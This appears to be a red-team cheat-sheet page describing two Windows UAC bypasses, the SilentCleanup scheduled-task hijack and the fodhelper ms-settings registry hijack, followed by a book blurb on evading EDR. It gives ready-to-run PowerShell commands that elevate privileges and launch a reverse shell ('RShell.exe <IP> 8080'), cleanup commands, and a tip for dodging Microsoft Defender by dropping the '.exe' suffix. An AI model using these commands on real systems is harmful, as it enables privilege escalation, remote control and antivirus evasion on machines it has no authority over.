User Access Control (UAC)
Bypass 1: DiskCleanup Scheduled Task Hijack
SilentCleanup is a scheduled task which is configured on Windows by default. It may be started from a process with a medium integrity level, and then automatically elevates to a high integrity level since the "Run with highest privileges" option is enabled.
It starts the program "%windir%\system32\cleanmgr.exe" with some arguments.
Set-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value "cmd.exe /K C:\Windows\Tasks\RShell.exe <IP> 8080 & REM " -Force
Start-ScheduledTask -TaskPath "\Microsoft\Windows\DiskCleanup" -TaskName "SilentCleanup"
Cleanup
Clear-ItemProperty -Path "HKCU:\Environment" -Name "windir" -ForceBypass 2: FodHelper Execution Hijack
Microsoft Defender Antivirus is only triggered when it senses ".exe" in the value being set, so if you simply remove the ".exe" you will not get blocked. RShell.exe => RShell
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "C:\Windows\Tasks\RShell <IP> 8080" -Force
C:\Windows\System32\fodhelper.exeCleanup
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -ForceSSPI Datagram Contexts
WinPwnage
Interesting Books
Interesting BooksEvading EDR: The Definitive Guide to Defeating Endpoint Detection Systems The author uses his years of experience as a red team operator to investigate each of the most common sensor components, discussing their purpose, explaining their implementation, and showing the ways they collect various data points from the Microsoft operating system. In addition to covering the theory behind designing an effective EDR, each chapter also reveals documented evasion strategies for bypassing EDRs that red teamers can use in their engagements.
Last updated